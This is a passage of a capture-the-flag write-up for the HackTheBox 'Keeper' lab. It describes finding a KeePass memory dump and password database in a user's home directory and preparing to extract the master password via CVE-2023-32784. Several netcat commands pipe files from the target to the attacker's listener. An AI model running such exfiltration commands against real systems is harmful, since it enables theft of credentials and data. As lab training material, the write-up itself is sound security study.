KeePass

By far, there’s been mentions of the KeePass crash dump from multiple sources, including the ticket in the web application, which is linked to the mail system and PEAS detecting it

lnorgaard@keeper:~$ ll
total 332868
drwxr-xr-x 5 lnorgaard lnorgaard      4096 aug 14 16:29 ./
drwxr-xr-x 3 root      root           4096 may 24 16:09 ../
lrwxrwxrwx 1 root      root              9 may 24 15:55 .bash_history -> /dev/null
-rw-r--r-- 1 lnorgaard lnorgaard       220 may 23 14:43 .bash_logout
-rw-r--r-- 1 lnorgaard lnorgaard      3771 may 23 14:43 .bashrc
drwx------ 2 lnorgaard lnorgaard      4096 may 24 16:09 .cache/
drwx------ 3 lnorgaard lnorgaard      4096 aug 14 16:41 .gnupg/
-rwxr-x--- 1 lnorgaard lnorgaard 253395188 may 24 12:51 KeePassDumpFull.dmp*
-rw-rw-r-- 1 lnorgaard lnorgaard        31 aug 13 00:40 KeePassStrings
-rw------- 1 lnorgaard lnorgaard        20 aug 14 02:22 .lesshst
-rwxr-x--- 1 lnorgaard lnorgaard      3630 may 24 12:51 passcodes.kdbx*
-rw------- 1 lnorgaard lnorgaard       807 may 23 14:43 .profile
-rw------- 1 lnorgaard lnorgaard         5 aug 13 00:41 .python_history
-rw-r--r-- 1 root      root       87391651 aug 14 16:44 RT30000.zip
drwx------ 2 lnorgaard lnorgaard      4096 jul 24 10:25 .ssh/
-rw-r----- 1 root      lnorgaard        33 aug 10 20:09 user.txt
-rw-r--r-- 1 root      root             39 jul 20 19:03 .vimrc

Checking the home directory of the lnorgaard user reveals a few interesting files Those are KeePassDumpFull.dmp, passcodes.kdbx and RT30000.zip

I will transfer them all to Kali to run analysis locally

lnorgaard@keeper:~$ cat KeePassStrings 
Please ask your administrator.

There is also the text file, KeePassStrings, which doesn’t reveal anything

RT30000.zip

lnorgaard@keeper:~$ md5sum ./RT30000.zip 
c29f90dbb88d42ad2d38db2cb81eed21  ./RT30000.zip
lnorgaard@keeper:~$ nc 10.10.14.20 2222 < RT30000.zip 
 
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ nnc 2222 > RT30000.zip
listening on [any] 2222 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.11.227] 41504
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ md5sum ./RT30000.zip
c29f90dbb88d42ad2d38db2cb81eed21  ./RT30000.zip

Transferring the RT30000.zip file to Kali

┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ file RT30000.zip                
RT30000.zip: Zip archive data, at least v2.0 to extract, compression method=deflate
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ 7z l RT30000.zip 
 
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,32 CPUs 11th Gen Intel(R) Core(TM) i9-11900H @ 2.50GHz (806D1),ASM,AES-NI)
 
Scanning the drive for archives:
1 file, 87391651 bytes (84 MiB)
 
Listing archive: RT30000.zip
 
--
Path = RT30000.zip
Type = zip
Physical Size = 87391651
 
   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2023-05-24 12:51:31 .....    253395188     87387677  KeePassDumpFull.dmp
2023-05-24 12:51:11 .....         3630         3630  passcodes.kdbx
------------------- ----- ------------ ------------  ------------------------
2023-05-24 12:51:31          253398818     87391307  2 files

The RT30000.zip file is the archive that contains both KeePassDumpFull.dmp and passcodes.kdbx This must be the attachment that the root user put in the mail.

passcodes.kdbx

lnorgaard@keeper:~$ md5sum ./passcodes.kdbx 
524564c6269378457e8101b74b4b2b2a  ./passcodes.kdbx
lnorgaard@keeper:~$ nc 10.10.14.20 2222 < passcodes.kdbx
 
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ nnc 2222 > passcodes.kdbx     
listening on [any] 2222 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.11.227] 38188
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ md5sum ./passcodes.kdbx
524564c6269378457e8101b74b4b2b2a  ./passcodes.kdbx

Transferring the passcodes.kdbx file to Kali

┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ file passcodes.kdbx     
passcodes.kdbx: Keepass password database 2.x KDBX

The passcodes.kdbx file is a password database file for KeePass Interesting thing is that it uses the version 2.x, which might suggest a specific vulnerability

The DB itself is locked with password

KeePassDumpFull.dmp

lnorgaard@keeper:~$ md5sum ./KeePassDumpFull.dmp
8899ee7c8b17da8716a89580b39194d3  ./KeePassDumpFull.dmp
lnorgaard@keeper:~$ nc 10.10.14.20 2222 < KeePassDumpFull.dmp
 
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ nnc 2222 > KeePassDumpFull.dmp  
listening on [any] 2222 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.11.227] 58210
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ md5sum ./KeePassDumpFull.dmp
8899ee7c8b17da8716a89580b39194d3  ./KeePassDumpFull.dmp

Transferring the KeePassDumpFull.dmp file to Kali

┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ file KeePassDumpFull.dmp 
KeePassDumpFull.dmp: Mini DuMP crash report, 16 streams, Fri May 19 13:46:21 2023, 0x1806 type

The KeePassDumpFull.dmp file is a memory dump of KeePass process

┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ volatility imageinfo -f  KeePassDumpFull.dmp -v
Volatility Foundation Volatility Framework 2.6.1
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : No suggestion (Instantiated with no profile)
                     AS Layer1 : FileAddressSpace (/home/kali/archive/htb/labs/keeper/KeePassDumpFull.dmp)
                      PAE type : No PAE

Unfortunately, volatility wasn’t able to confirm the image profile

Looking it up online reveals an Exploit PoC regarding a [[Keeper_CVE-2023-32784#[CVE-2023-32784](https //nvd.nist.gov/vuln/detail/cve-2023-32784)|vulnerability]]

InfoSec LAB

Explorer

Keeper_KeePass

KeePass

RT30000.zip

passcodes.kdbx

KeePassDumpFull.dmp

Interactive Graph View

Table of Contents

Backlinks